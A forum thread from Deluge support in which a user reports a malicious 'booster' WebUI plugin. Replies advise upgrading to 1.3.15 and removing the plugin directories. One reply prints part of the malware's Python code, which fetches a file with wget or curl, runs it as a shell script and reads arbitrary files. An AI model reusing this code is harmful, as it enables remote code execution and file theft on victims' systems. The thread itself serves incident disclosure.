Page 1 of 2

[WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Sat May 13, 2017 3:53 am
by ggez
Admin Edit: Upgrade to 1.3.15 to fix this vulnerability

I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S

I am running deluge/deluge-web on Raspbian

https://drive.google.com/file/d/0B23kWK ... sp=sharing

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 7:04 am
by Cas
If your webui is open to the internet it likely is a malicious egg utilising a know security flaw.

Upgrade to 1.3.15 as it has webui security fixes.

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 7:16 am
by Cas
Also you should report this to debian as a serious security issue

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 8:05 am
by Tvich

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 8:20 am
by Cas
It definitely is malicious, it is modified execute plugin code.

Re: Malicious plugin "booster" found on my system?

Posted: Sat May 13, 2017 9:02 am
by Tvich
My bad, i misunderstood, thought it was Boost.Python. Don't know why. My bad :(

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Sun May 14, 2017 4:08 pm
by ggez
Oh sh!t, didn't expect it to be this bad... any idea what it might have downloaded? are there any paths that I can check?

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Sun May 14, 2017 4:58 pm
by Cas
There is likely no way to know for sure.

For reference this is partial summary of code added to the execute plugin:

Code: Select all

def looking_file(name):
    epath = os.environ.get("PATH", None)
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)
    
def yahoo(URL):
    wget = looking_file("wget")
    curl = looking_file("curl")    
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
    
    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()
    
    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass           
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)

    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0555)
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"
    
    def get_file(self, filename):
        if os.path.exists(filename):
            fp = open(filename)
            data = fp.read()
            fp.close()
            return data
        else:
            return "FILE %s not exists" % filename

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Thu Jul 12, 2018 12:52 pm
by eb98jdb
How do you remove this malware?

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Posted: Fri Jul 13, 2018 1:40 pm
by Shryp
eb98jdb wrote:How do you remove this malware?
I am not for sure on this as I have never had the issue, but on my system plugins are saved in
/home/[USER NAME]/.config/deluge/plugins
and also
/home/[USER NAME]/.cache/Python-Eggs/

I would shut down deluge and remove them from there as a first step.